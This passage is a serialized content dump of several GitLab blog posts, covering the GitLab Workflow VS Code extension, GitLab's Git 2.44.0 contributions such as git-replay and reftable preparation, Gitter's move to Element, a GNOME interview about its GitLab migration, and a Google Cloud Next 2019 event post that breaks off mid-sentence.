extension.\n\n## Demo\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/XcxsF0lWBhA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## First iteration of GitLab Workflow\n\nThis was my first attempt at writing a VS Code extension, and I wanted to build something simple as a first iteration. I built an extension that allowed users to see issues and merge requests assigned to them on GitLab.com. The detailed documentation and powerful APIs of VS Code enabled me to build my first version in less than two hours! It was an enjoyable experience.\n\n## Further iterations\n\nThis led to the creation of my second iteration: showing MR URLs, providing the pipeline status on the status bar, opening the current file and current MR on GitLab.com. I shared this second iteration with my fellow GitLab team-members on our internal Slack and received a lot of positive feedback. After that, I released new iterations and it got more than 5,000 installations in just a month. It was so well received that it was featured on the \"Trending this week\" section of Visual Studio Marketplace and is still currently being featured on the \"Trending this month\" section 🎉\n\n\u003Ccenter>\u003Cimg src=\"/images/blogimages/gitlab-vscode-extension/trending-this-month.png\" alt=\"GitLab Workflow on Visual Studio Marketplace\" style=\"width: 700px;\"/>\u003C/center>{: .shadow}\n\nThe current version of this extension allows you to:\n\n- See pipeline status, open MR and close issue links in the status bar. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#status-bar).\n- Automatically update pipeline status on the status bar so you don't need to open GitLab to see your pipeline status.\n- Advanced pipeline actions allow you to view a pipeline on GitLab, create a new pipeline, and retry or cancel current pipeline. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#pipeline-actions).\n- Issue and MR search including simple and advanced search. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#advanced-search).\n- View an MR and close an issue on GitLab with a single click from your status bar.\n- View an active file on GitLab with highlighting active line number and selected text block. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#open-active-file).\n- Create public, internal or private snippet from entire file or selection. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#create-snippet).\n- Compare your branch with master and view changes on GitLab. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#compare-with-master).\n- Validate GitLab CI configuration file `.gitlab-ci.yml`. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#validate-gitlab-ci-configuration).\n\nSee below for more tasks you can perform quickly with the extension.\n\n\u003Ccenter>\u003Cimg src=\"/images/blogimages/gitlab-vscode-extension/gitlab-vscode.png\" alt=\"GitLab Workflow Commands\" style=\"width: 700px;\"/>\u003C/center>{: .shadow}\n\nYou can find the source code [here](https://gitlab.com/fatihacet/gitlab-vscode-extension) and see the extension [on the Visual Studio Marketplace](https://marketplace.visualstudio.com/items?itemName=fatihacet.gitlab-workflow). You can read the documentation [here](https://docs.gitlab.com/ee/user/project/repository/vscode.html) and check the CHANGELOG [here](https://gitlab.com/fatihacet/gitlab-vscode-extension/blob/master/CHANGELOG.md). There is also a [Product Hunt page](https://www.producthunt.com/posts/gitlab-workflow) for the extension.\n\nPhoto by [Iker Urteaga](https://unsplash.com/photos/TL5Vy1IM-uA?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/tools?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[1037,9,231],{"slug":2720,"featured":6,"template":689},"gitlab-vscode-extension","content:en-us:blog:gitlab-vscode-extension.yml","Gitlab Vscode Extension","en-us/blog/gitlab-vscode-extension.yml","en-us/blog/gitlab-vscode-extension",{"_path":2726,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2727,"content":2733,"config":2738,"_id":2740,"_type":14,"title":2741,"_source":16,"_file":2742,"_stem":2743,"_extension":19},"/en-us/blog/gitlabs-contributions-to-git-2-44-0",{"title":2728,"description":2729,"ogTitle":2728,"ogDescription":2729,"noIndex":6,"ogImage":2730,"ogUrl":2731,"ogSiteName":673,"ogType":674,"canonicalUrls":2731,"schema":2732},"GitLab's contributions to Git 2.44.0","Find out the topics that GitLab’s Git team – as well as the wider community – contributed to the latest Git release, including fast scripted rebases via git-replay.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666069/Blog/Hero%20Images/AdobeStock_639935439.jpg","https://about.gitlab.com/blog/gitlabs-contributions-to-git-2-44-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab's contributions to Git 2.44.0\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2024-02-26\",\n      }",{"title":2728,"description":2729,"authors":2734,"heroImage":2730,"date":2735,"body":2736,"category":10,"tags":2737},[747],"2024-02-26","The Git project recently released [Git 2.44.0](https://git-scm.com/downloads). In this blog post, we will highlight the contributions made by GitLab's Git team, as well as those from the wider Git community.\n\n## Fast scripted rebases via `git-replay`\n\nThe `git-rebase` command can be used to reapply a set of commits onto a different base commit. This can be quite useful when you have a feature branch where the main branch it was originally created from has advanced since creating the feature branch.\n\nIn this case, `git-rebase` can be used to reapply all commits of the feature branch onto the new commits of the main branch.\n\nSuppose you have the following commit history with the main development branch `main` and your feature branch `feature`:\n\n![main and feature branch](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678099/Blog/Content%20Images/Screenshot_2024-02-20_at_2.15.37_PM.png)\n\nYou have originally created your feature branch from `m-2`, but since then the `main` branch has gained two additional commits. Now `git-rebase` can be used to reapply your commits `f-1` and `f-2` on top of the newest commit `m-4`:\n\n![applying git-rebase](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678099/Blog/Content%20Images/Screenshot_2024-02-20_at_2.16.28_PM.png)\n\nYou can see this functionality in GitLab when you create a merge request. When you want to reapply the commits of your merge request onto new commits in the target branch, all you have to do is [to create a comment that contains the `/rebase` command](https://docs.gitlab.com/ee/topics/git/git_rebase.html#rebase-from-the-ui). The magic then happens behind the scenes.\n\nThere is one problem though: `git-rebase` only works on repositories that have a worktree (a directory where a branch, tag or commit has been checked out). The repositories we host at GitLab are “bare” repositories, which don’t have a worktree. This means that the files and directories tracked by your commits are only tracked as Git objects in the `.git` directory of the repository. This is mostly done to save precious disk space and speed up operations.\n\nIn the past, we used [libgit2](https://libgit2.org/) to implement rebases. But for various reasons, we decided to remove this dependency in favor of only using Git commands to access Git repositories. But this created a problem for\nus because we could neither use libgit2 nor `git-rebase` to perform rebases. While we could create an ad-hoc worktree to use `git-rebase`, this would have been prohibitively expensive in large monorepos.\n\nLuckily, [Elijah Newren](https://www.linkedin.com/in/elijah-newren-0a41665/) has upstreamed a new merge algorithm called `merge-ort` in Git 2.33. Despite being significantly faster than the old `recursive` merge strategy in almost all cases, it also has the added benefit that it can perform merges in-memory. In practice, this also allows us to perform such rebases in-memory.\n\nEnter `git-replay`, which is a new command that does essentially the same thing as `git-rebase` but in-memory, thus not requiring a worktree anymore. This is an\nimportant building block to allow us to develop faster rebasing of merge requests in the future.\n\nYou may ask: Why a new command instead of updating `git-rebase`? The problem here was that `git-rebase` is essentially a user-focused command (also called a\n\"porcelain\" command in Git). Thus it performs several actions that are not required by a script at all, like, for example, executing hooks or checking out files into the worktree. The new `git-replay` command is a script-focused\ncommand (also called a \"plumbing\" command in Git) and has a different set of advantages and drawbacks. Furthermore, besides doing rebases, we plan to use it to do cherry-picks and reverts in the future, too.\n\nThis topic was a joint effort by [Elijah Newren](https://www.linkedin.com/in/elijah-newren-0a41665/) and\n[Christian Couder](https://www.gitlab.com/chriscool).\n\n## Commit-graph object existence checks\n\nYou may know that each commit can have an arbitrary number of parents:\n\n- The first commit in your repository has no parents. This is the \"root\" commit.\n- Normal commits have a single parent.\n- Merge commits have at least two, but sometimes even more than two parents.\n\nThis parent relationship is part of what forms the basis of Git's object model and establishes the object graph. If you want to traverse this object graph, Git must look up an entry point commit and from there walk the parent chain of commits.\n\nTo fully traverse history from the newest to the oldest commit, you must look up and parse all commit objects in between. Because repositories can consist of hundreds of thousands or even millions of such commits, this can be\nquite an expensive operation. But users of such repositories still want to be able to, for example, search for a specific commit that changes a specific file\nwithout waiting several minutes for the search to complete.\n\nThe Git project introduced a commit-graph data structure a long time ago that essentially caches a lot of the parsed information in a more accessible data structure. This commit-graph encodes the parent-child relation and some additional information, like, for example, a [bloom filter](https://en.wikipedia.org/wiki/Bloom_filter) of changed\nfiles.\n\nThis commit-graph is usually updated automatically during repository housekeeping. Because housekeeping only runs every so often, the commit-graph can be missing entries for recently added commits. This is perfectly fine and expected to happen, and Git knows to instead look up and parse the commit object in such a case.\n\nNow, the reverse case also theoretically exists: The commit-graph contains cached information of an object that does not exist anymore because it has been deleted without regenerating the commit-graph. The consequence would\nbe that lookups of this commit succeed even though they really shouldn't. To avoid this, in Git 2.43.0, we upstreamed a change into Git that detects commits\nthat exist in the commit-graph but no longer in the object database.\n\nThis change requires us to do an existence check for every commit that we parse via the commit-graph. Naturally, this change leads to a performance regression, which was measured to be about 30% in the worst case. This was\ndeemed acceptable though, because it is better to return the correct result slowly than to return the wrong result quickly. Furthermore, the commit-graph still results in a significant performance improvement compared to not using the commit-graph at all. To give users an escape hatch in case they do not want this performance regression, we also introduced a `GIT_COMMIT_GRAPH_PARANOIA` environment variable that can be used to disable this check.\n\nAfter this change was merged and released though, we heard of cases where the impact was even worse than 30%: counting the number of commits via `git rev-list --count` in the Linux repository regressed by about 100%. After some\ndiscussion upstream, we changed the default so that we no longer verify commit existence for the commit-graph to speed up such queries again. Because repository housekeeping should ensure that commit-graphs are consistent, this change should stop us from needlessly pessimizing this uncommon case.\n\nThis change was implemented by\n[Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Making Git ready for a new ref backend\n\nA common theme among our customers is that large monorepos with many refs create significant performance problems with many workloads. The range of problems here are manyfold, but the more refs a repository has, the more pronounced the problems become.\n\nMany of the issues are inherent limitations of the way Git stores refs. The so-called `files` ref backend uses a combination of two mechanisms:\n- \"Loose refs\" are simple files that contain the object ID they point to.\n- \"Packed refs\" are a single file that contains a collection of refs.\n\nWhenever you update or create a ref, Git creates them as a loose ref. Every once in a while, repository housekeeping then compresses all loose refs into the `packed-refs` file and deletes the corresponding loose refs. A typical repo looks as follows:\n\n```shell\n $ git init --ref-format=files repo\nInitialized empty Git repository in /tmp/repo/.git/\n $ cd repo/\n $ git commit --allow-empty --message \"initial commit\"\n $ tree .git/\n.git/\n├── config\n├── HEAD\n├── index\n└── refs\n\t├── heads\n\t│   └── main\n\t└── tags\n $ cat .git/HEAD\nref: refs/heads/main\n $ cat .git/refs/heads/main\nbf1814060ed3a88bd457ac4dca055d000ffe4482\n\n $ git pack-refs --all\n $ cat .git/packed-refs\n# pack-refs with: peeled fully-peeled sorted\nbf1814060ed3a88bd457ac4dca055d000ffe4482 refs/heads/main\n```\n\nWhile this model has served the Git project quite well, relying on a filesystem like this has several limitations:\n- Deleting a single ref requires you to rewrite the `packed-refs` file, which can be gigabytes in size.\n- It is impossible to do atomic reads because you cannot atomically scan multiple files at once when a concurrent writer may modify some refs.\n- It is impossible to do atomic writes because creating or updating several refs requires you to write to several files.\n- Housekeeping via `git-pack-refs` does not scale well because of its all-into-one repacking nature.\n- The storage format of both loose and packed refs is inefficient and wastes disk space.\n- Filesystem-specific behavior can be weird and may restrict which refs can be created. For example, Case-insensitivity on filesystems like FAT32 can cause issues, when trying to create two refs with the same name that only differ in their case.\n\nSeveral years ago, [Shawn Pearce](https://sfconservancy.org/blog/2018/jan/30/shawn-pearce/) had proposed the \"reftable\" format as an alternative new format to store refs in a repository. This new format was supposed to help with most or all of the above issues and is essentially a\nbinary format specifically catered towards storing references in Git.\n\nThis new \"reftable\" format has already been implemented by\n[JGit](https://www.eclipse.org/jgit/) and is used extensively by the [Gerrit project](https://www.gerritcodereview.com/). And, in 2021, [Han-Wen Nienhuys](https://www.linkedin.com/pub/dir/han-wen/nienhuys) upstreamed a library to read and write reftables into the Git project. What is still missing though is the backend that ties together the reftable library and\nGit, and unfortunately progress has stalled here. As we experience much of the pain that the reftable format is supposed to address, we decided to take over the work from Han-Wen and continue the upstreaming process.\n\nBefore we can upstream the reftable backend itself though, we first had to prepare several parts of Git for such a new backend. While the Git project already has a concept of different ref backends, the boundaries were very blurry because until now there only exists a single \"files\" backend.\n\nThe biggest contribution by GitLab in this release was thus a joint effort to prepare all the parts of Git for the new backend that were crossing boundaries:\n- Some commands used to read or write refs directly via the filesystem without going through the ref backend.\n- The ref databases of worktrees created via `git-worktree` were initialized ad-hoc instead of going through the ref backend.\n- Cloning a repository created the ref database with the wrong object format when using SHA256. This did not matter with the \"files\" backend because the format was not stored anywhere by the ref backend itself. But because the reftable backend encodes the format into its binary format, this was a problem.\n- Many tests read or write refs via the filesystem directly.\n- We invested quite some time already into bug fixing and performance optimizations for the reftable library itself.\n- We introduced a new `refStorage` extension that tells Git in which format the repository stores its refs. This can be changed when creating a new repository by specifying `--ref-format` flag in `git-init` or `git-clone`. For now, only the “files” format is supported.\n\nThe overarching goal was to get the work-in-progress reftable backend into a state where it passes the complete test suite. And even though the reftable backend is not yet part of Git 2.44.0, I am happy to report that we have\nsucceeded in this goal: Overall, we have contributed more than 150 patches to realize it. Given the current state, we expect that the new reftable backend will become available with Git v2.45.0.\n\nWe will not cover the new reftable format in this post because it is out of scope, but stay tuned for more details soon!\n\nThis project was a joint effort by\n[John Cai](https://gitlab.com/jcaigitlab),\n[Justin Tobler](https://gitlab.com/justintobler),\n[Karthik Nayak](https://gitlab.com/knayakgl),\n[Stan Hu](https://gitlab.com/stanhu),\n[Toon Claes](https://gitlab.com/toon),\nand [Patrick Steinhardt](https://gitlab.com/pks-gitlab), who has led the effort. Credit also goes to\n[Shawn Pearce](https://sfconservancy.org/blog/2018/jan/30/shawn-pearce/) as original inventor of the format and [Han-Wen Nienhuys](https://www.linkedin.com/pub/dir/han-wen/nienhuys) as the\nauthor of the reftable library.\n\n## Support for GitLab CI\n\nAs all the preparations for the new `reftable` backend demonstrate, we have significantly increased our investments into the long-term vision and health of\nthe Git project. And because a very important part of our product depends on the Git project to remain healthy, we want to continue investing into the Git project like this.\n\nFor us, this means that it was high time to improve our own workflows in the context of the Git project. Naturally, we were already using GitLab CI as part of the process instead of the GitHub Workflows support that existed in\nthe Git project. But we were using a [`.gitlab-ci.yml` definition](https://docs.gitlab.com/ee/ci/yaml/) that was not part of the upstream repository and instead maintained outside the Git project.\n\nWhile this worked reasonably well, there were two significant downsides:\n- Test coverage was significantly lower than that of the GitHub Workflows definition. Notably, we did not test on macOS, had no static analysis, and didn't test with non-default settings. This often led to failures in the GitHub Workflows pipeline that we could have detected earlier if we had better CI integration.\n- Other potential contributors to Git who may already be using GitLab on a daily basis didn't have easy access to a GitLab CI pipeline.\n\nTherefore, we decided to upstream a new GitLab CI definition that integrates with the preexisting CI infrastructure that the Git project already had. Because we reuse a lot of pre-existing infrastructure, this ensures that both GitLab CI and GitHub Workflows run tests mostly in the same way.\n\nAnother benefit of GitLab CI support is that, for the first time, we now also exercise an architecture other than `x86_64` or `i686`: the [macOS runners we provide at GitLab.com](https://docs.gitlab.com/ee/ci/runners/saas/macos_saas_runner.html) use an Apple M1, which is based on the `arm64` architecture.\n\nThis change was contributed by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## More to come\n\nThis blog post gives just a glimpse into what has happened in the Git project, which lies at the heart of [source code management](https://about.gitlab.com/solutions/source-code-management/) at GitLab. Stay tuned for more insights into future contributions and the reftable backend in particular!",[751,9,1036],{"slug":2739,"featured":6,"template":689},"gitlabs-contributions-to-git-2-44-0","content:en-us:blog:gitlabs-contributions-to-git-2-44-0.yml","Gitlabs Contributions To Git 2 44 0","en-us/blog/gitlabs-contributions-to-git-2-44-0.yml","en-us/blog/gitlabs-contributions-to-git-2-44-0",{"_path":2745,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2746,"content":2751,"config":2757,"_id":2759,"_type":14,"title":2760,"_source":16,"_file":2761,"_stem":2762,"_extension":19},"/en-us/blog/gitter-moves-to-element",{"title":2747,"description":2748,"ogTitle":2747,"ogDescription":2748,"noIndex":6,"ogImage":1211,"ogUrl":2749,"ogSiteName":673,"ogType":674,"canonicalUrls":2749,"schema":2750},"Gitter lands new home in Matrix with Element","Gitter’s new owner Element will continue to support and invest in the service and user communities.","https://about.gitlab.com/blog/gitter-moves-to-element","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Gitter lands new home in Matrix with Element\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Eliran Mesika\"}],\n        \"datePublished\": \"2020-09-30\",\n      }",{"title":2747,"description":2748,"authors":2752,"heroImage":1211,"date":2754,"body":2755,"category":930,"tags":2756},[2753],"Eliran Mesika","2020-09-30","\n\nGitter, the open source [chat and networking platform](/blog/gitter-acquisition/), has been sold to secure chat application company [Element](https://element.io) which will continue to support and invest in the service and the user communities going forward.\n\nAs many of you are aware, GitLab has been focused this year on driving efficiency with a goal of extending our depth in our core product categories. That focus led us to look for a buyer for Gitter that could increase investment required to serve developers. With Element’s acquisition of Gitter, GitLab has more bandwidth to devote to our core business and Gitter will continue to have opportunities to thrive. \n\n“A great project chat is an essential element of most open source projects and Gitter is the leading open source solution,” says [Sid Sijbrandij](/company/team/#sytses), CEO, GitLab. “Under GitLab, Gitter’s community has grown to 1.7M users who have also contributed to improving the product for everyone. We are happy that Gitter will now have a fantastic home with Element. They have the momentum to quickly build on the success of Gitter to expand its footprint within the developer community and act as a driver for the rest of its business and the Matrix ecosystem. It’s a great home for Gitter.”\n\nElement is the company behind [Matrix](https://matrix.org), the open network for secure and decentralized communication with more than 20 million users. \n\n“It’s a privilege to have Gitter join Element,” says Matthew Hodgson, CEO and CTO at Element. “Gitter is the only chat platform focusing exclusively on developers, and we cannot wait to extend its reach to the entirety of the open Matrix network - confirming Matrix as an ideal home for open collaboration between software developers.”\n\nFounded in 2014, Gitter has operated as a standalone product, independent of GitLab, since 2017. Gitter is unique in its developer focus –  the tagline is “Where developers come to talk.” Used by large communities including [Node](https://gitter.im/nodejs/home), [TypeScript](https://gitter.im/Microsoft/TypeScript), [Angular](https://gitter.im/angular/home) and [Scala](https://gitter.im/scala/home), Gitter’s service is free, open source and has no commercial edition. A complete, indexed message history and robust integration [API](https://developer.gitter.im/docs/welcome) makes Gitter a perfect platform for managing communities around open-source projects. Gitter is available on the web with clients available for Mac, Windows, Linux, iOS, and Android.\n\n## Going forward\n\n[Element plans](https://element.io/blog/gitter-is-joining-element) to build out native Matrix connectivity, replacing the [matrix-appservice-gitter](https://github.com/matrix-org/matrix-appservice-gitter) bridge running since 2016. Over time, Gitter will effectively become a Matrix client.\n\nGet more details on this transition on the [Changelog podcast](https://cdn.changelog.com/uploads/podcast/414/the-changelog-414.mp3).\n\nMatrix has a [detailed Gitter transition plan](https://matrix.org/blog/welcoming-gitter-to-matrix) and welcomes [feedback on the process](https://matrix.to/#/#gitter:matrix.org).\n",[267,9,803],{"slug":2758,"featured":6,"template":689},"gitter-moves-to-element","content:en-us:blog:gitter-moves-to-element.yml","Gitter Moves To Element","en-us/blog/gitter-moves-to-element.yml","en-us/blog/gitter-moves-to-element",{"_path":2764,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2765,"content":2771,"config":2777,"_id":2779,"_type":14,"title":2780,"_source":16,"_file":2781,"_stem":2782,"_extension":19},"/en-us/blog/gnome-follow-up",{"title":2766,"description":2767,"ogTitle":2766,"ogDescription":2767,"noIndex":6,"ogImage":2768,"ogUrl":2769,"ogSiteName":673,"ogType":674,"canonicalUrls":2769,"schema":2770},"GNOME: two years after the move to GitLab","Extensive CI/CD adoption and easier contributions are just a couple of the benefits of #movingtogitlab for GNOME.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671276/Blog/Hero%20Images/gitlab-gnome.png","https://about.gitlab.com/blog/gnome-follow-up","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GNOME: two years after the move to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2020-09-08\",\n      }",{"title":2766,"description":2767,"authors":2772,"heroImage":2768,"date":2774,"body":2775,"category":10,"tags":2776},[2773],"Nuritzi Sanchez","2020-09-08","\n\n_It's been a little over two years since the [GNOME project moved to GitLab](/blog/welcome-gnome-to-gitlab/). We wanted to check in to see what’s happening at GNOME these days and see if they had noticed an impact from their migration on their community and their software development lifecycle. To find out the latest, we spoke with [Carlos Soriano](https://www.linkedin.com/in/carlos-soriano-sanchez-4b361240/) and [Sri Ramkrishna](https://www.linkedin.com/in/sriram-ramkrishna/) from GNOME and combined their responses._ \n\n### How are you using GitLab at GNOME? \n\nGNOME is using GitLab’s [Community Edition](/install/ce-or-ee/), which is entirely open source.\n\nAll teams at GNOME have been using GitLab for over a year, including non-coding teams like engagement and design, and the board of directors. The GNOME Foundation’s staff is also using GitLab for things like grant writing and running the foundation. \n\nGNOME is using most features that GitLab has to offer, such as [CI/CD](/topics/ci-cd/) for testing, issue tracking, kanban boards, and labels. Labels and CI/CD are two of the most important features being used across the entire organization. \n\nIn addition to this, GNOME is using GitLab Pages for some of the landing pages for projects, and also to host documentation.\n\nThe only team that hasn’t fully been able to use GitLab is the GNOME translation team since they need a different set of permissions and roles than GitLab provides. For them, Bugzilla was more flexible, and so some of their workflow is still there and in other tools. However, they are using GitLab for issue tracking and coordination. \n\nHere's how [GNOME has set up its GitLab instance](https://gitlab.gnome.org/explore/groups).\n\n### What are some of the changes that you’ve noticed in your community? \n\nThe perception at GNOME is that the move to GitLab has made it easier for people to contribute to GNOME. \n\nOne noticeable difference is that a lot of people are now using the GNOME GitLab instance to host their own projects that are somehow related to GNOME but aren’t part of the core software produced by GNOME. This has increased GNOME’s developer community. \n \nAnother noticeable difference in the community is that, since moving to GitLab, there is more awareness around what CI/CD is and how important it is to the development process. CI/CD is being used extensively throughout the project. \n\nThere is now also more transparency at GNOME, which is both a blessing and a curse. More people from the wider community are able to see what’s happening in the development cycle, and are chiming in on issues and merge requests.  This has caused friction at times when things like designs were picked up by the wider community that weren’t ready for comments. \n\nUnfortunately, GNOME does not currently have metrics to share about the changes they’ve seen within their community; however, the overall sentiment has been positive towards the move to GitLab. GNOME is on the path to being a more data-driven organization than it has been in the past, and hopes to share more concrete data in the future. \n\n### What are some of the changes in GNOME’s software development lifecycle?\n\nThe biggest change in GNOME's software development lifecycle is that they can now build images for testing pipelines, something that couldn't be done before moving to GitLab. In the future, they hope to allow people to preview upcoming releases. \n\nDespite the positive changes in testing practices due to the move to GitLab, QA and wider community testing are still challenges for GNOME. (To be fair, GitLab's Global 2020 DevSecOps Survey found [QA/test remain challenging for everyone.](/developer-survey/)) Coordinating teams and members within a large free software project like GNOME is similar to doing so at a large commercial organization -- mostly around coordinating milestones and features spanning multiple teams. This means that GNOME has to hack around the limits of the GitLab Community Edition with homegrown tools.\n\nAnother big change to GNOME’s software development lifecycle is that there is now a closer relationship between designers and maintainers because there is more transparency on what the design team is doing.  \n\nThe move to GitLab has also shortened the cycle for developing [Flatpak](https://flatpak.org/), a software deployment and package management technology created by members of the GNOME community. The community can now automatically build Flatpak bundles and test changes against those instead of committing things to code. This shortens the feedback for QA, design, and releasing the software. \n\n### What do you think GitLab is doing well in supporting open source communities and what else would you like to see?\n\nOne of the things that GNOME appreciates most about GitLab is its transparency. It helps to know the roadmap and see what is being worked on in order to form proper expectations and plan ahead. \n\nGNOME is also happy that GitLab is continuing to grow its Developer Relations team and has invested in hiring an open source program manager. They are encouraged that GitLab now has a dedicated resource to understand the specific needs of open source communities on GitLab and craft a strategy to enable growth in this segment.\n\nUsing the Community Edition adds some challenges for open source communities since they often have to ask for features to be ported down. There are common features that are important to a lot of open source projects and communities and it is important to identify those and port them down. Having someone who can start conversations around these features is important. \n\nAnother area of opportunity for GitLab is to foster a closer relationship between the GitLab team and the community. GNOME would find it especially helpful to get to know GitLab engineers and product managers, in order to feel more comfortable collaborating with them. \n\nWhile there is more work to be done on this, GitLab is actively taking this feedback into account and is rolling out changes to the [GitLab forum](https://forum.gitlab.com/). Instead of being just a place to ask technical questions and find answers, there will soon be more of a social component as well.\n\n### What kind of organizations would you recommend GitLab for?\n\nLarge open source organizations that require coordination among various contributors will benefit from using GitLab. The project or organization doesn’t have to be super big, but when you have 20-40 people, or if your project is something that the industry depends on, GitLab is a great choice due to its features that enable project management, issue tracking, and CI for testing. \n\nAlso, if you’re into open source software, then GitLab is your best option from a feature to feature comparison. \n\n### What’s new at GNOME and what are some of the new things on the horizon?\n\nGNOME is continuing to invest in expanding its contributor base. Not only are they working on initiatives to improve and scale newcomer onboarding, but they are also hosting a [Community Engagement Challenge](https://www.gnome.org/news/2019/08/gnome-foundation-launches-coding-education-challenge/), along with Endless, to get a younger generation into open source. The Challenge has multiple stages and includes over $65,000 USD in cash and prizes. Phase One winners were recently announced at this year’s [GUADEC](https://events.gnome.org/event/1/), GNOME’s annual core conference. \n\nThis year’s GUADEC was done remotely due to the pandemic and was a huge success! If you missed it, be sure to check out the [GUADEC YouTube channel](https://www.youtube.com/user/GUADEC/) for videos of the talks. Coming soon will be the annual [GNOME.Asia Summit](https://www.gnome.asia/), and the [Linux App Summit](https://linuxappsummit.org/), which will be co-hosted again with [KDE](https://kde.org/). GNOME also hopes to hold a first-ever Pan African GNOME Summit (PAGS) in the upcoming year. \n\nFrom a technical standpoint, GNOME is trying to remove their over-reliance on mailing lists by using GitLab projects instead. The release team now makes “freeze break” requests in a GitLab project, and the security team uses a web form that opens a confidential issue in a GitLab project through the GitLab Service Desk feature.\n\nAfter enthusiastically adopting CI pipelines, GNOME projects are now trying to optimize their workflows to minimise time spent, bandwidth, and energy consumption.\n\nLast but not least, some GNOME members are working on implementing community health metrics in order to evolve into a more data-driven organization. The [App Ecosystem working group at CHAOSS](https://chaoss.community/participate/) was founded earlier this year as a result, and includes members from GNOME and KDE, among others. New members are encouraged to join!\n\n",[267,9,708],{"slug":2778,"featured":6,"template":689},"gnome-follow-up","content:en-us:blog:gnome-follow-up.yml","Gnome Follow Up","en-us/blog/gnome-follow-up.yml","en-us/blog/gnome-follow-up",{"_path":2784,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2785,"content":2791,"config":2797,"_id":2799,"_type":14,"title":2800,"_source":16,"_file":2801,"_stem":2802,"_extension":19},"/en-us/blog/google-next-post",{"title":2786,"description":2787,"ogTitle":2786,"ogDescription":2787,"noIndex":6,"ogImage":2788,"ogUrl":2789,"ogSiteName":673,"ogType":674,"canonicalUrls":2789,"schema":2790},"What to check out at Google Cloud Next 2019","Support women who code by stopping by our booth, learn from a host of GitLab experts, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679235/Blog/Hero%20Images/cloud-native-predictions-2019.jpg","https://about.gitlab.com/blog/google-next-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What to check out at Google Cloud Next 2019\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mayank Tahilramani\"}],\n        \"datePublished\": \"2019-04-04\",\n      }",{"title":2786,"description":2787,"authors":2792,"heroImage":2788,"date":2794,"body":2795,"category":299,"tags":2796},[2793],"Mayank Tahilramani","2019-04-04","\n\nIt’s that time of the year to indulge in all things innovative and new at Google Cloud Next 2019.\nAs an attendee last year, I was excited to learn about Google’s vision on ‘bringing the cloud to you’\nwith a focus on hybrid cloud and unveiling of GKE On-Prem. GitLab’s partnership with Google\nhas grown a lot since we launched our quick and easy [integration with GKE](/partners/technology-partners/google-cloud-platform/)\nlast year and we hope you will come out to see some of the new things we have going on.\n\n### Don't be shy, come say hi 👋\n\nCome visit us at our booth (#S1607), get scanned, and GitLab will donate $5 to your\ncharity of choice: [Rail Girls](http://railsgirls.com/) or [Django Girls](https://djangogirls.org/).\nThis also enters you for a chance to win an iPad Pro!\n\nWhile you're there, we would love to showcase and talk about:\n\n* GitLab’s [AutoDevOps](https://docs.gitlab.com/ee/topics/autodevops/) functionality.\n* Using GitLab to [secure your applications](/stages-devops-lifecycle/secure/).\n* How to get started with [GitLab for GCP on GKE](/partners/technology-partners/google-cloud-platform/) and GKE On-Prem.\n* GitLab [Serverless with Knative](/topics/serverless/) and [Cloud Run](https://cloud.google.com/blog/products/serverless/announcing-cloud-run-the-newest-member-of-our-serverless-compute-stack),\n* ... and much more!\n\n### Sit back, relax, and listen to some of our experts live\n\n* Check out [Brandon Jung](/company/team/#brandoncjung) (VP of Alliances) discuss [GitLab’s move from Azure to GCP](https://cloud.withgoogle.com/next/sf/sessions?session=ARC207) which includes a technical\noverview of the migration as well as lessons learned. Check out our customer case study [here](https://cloud.google.com/customers/gitlab/).\n\n* Come listen to [Kathy Wang](/company/team/#wangkathy) (Senior Director of Security) tell our journey [Towards Zero Trust at GitLab.com](https://cloud.withgoogle.com/next/sf/sessions?session=SEC220) along with key lessons learned. ([You can read more about the evolution of Zero Trust here](/blog/evolution-of-zero-trust/).)\n\n* Learn something new with [Daniel Gruesso](/company/team/#danielgruesso) (Product Manager) showcasing GitLab’s serverless functionality to [Run a consistent serverless platform anywhere with Kubernetes and Knative](https://cloud.withgoogle.com/next/sf/sessions?session=HYB218).\n\n### Get hands on with Qwiklabs\n\nLearn from [Dan Gordon](/company/team/#dbgordon) (Senior Technical Marketing Manager) at our [Spotlight Lab: Introduction to GitLab on GKE](https://cloud.withgoogle.com/next/sf/sessions?session=301353-133371). Here you will have the chance to deploy GitLab on GKE, migrate a GitHub repository into a GitLab Project, and set up a CI/CD pipeline with AutoDevOps to deploy your code to GKE.\n\nSo stop by and say hello!\n\nWe are proud to be a 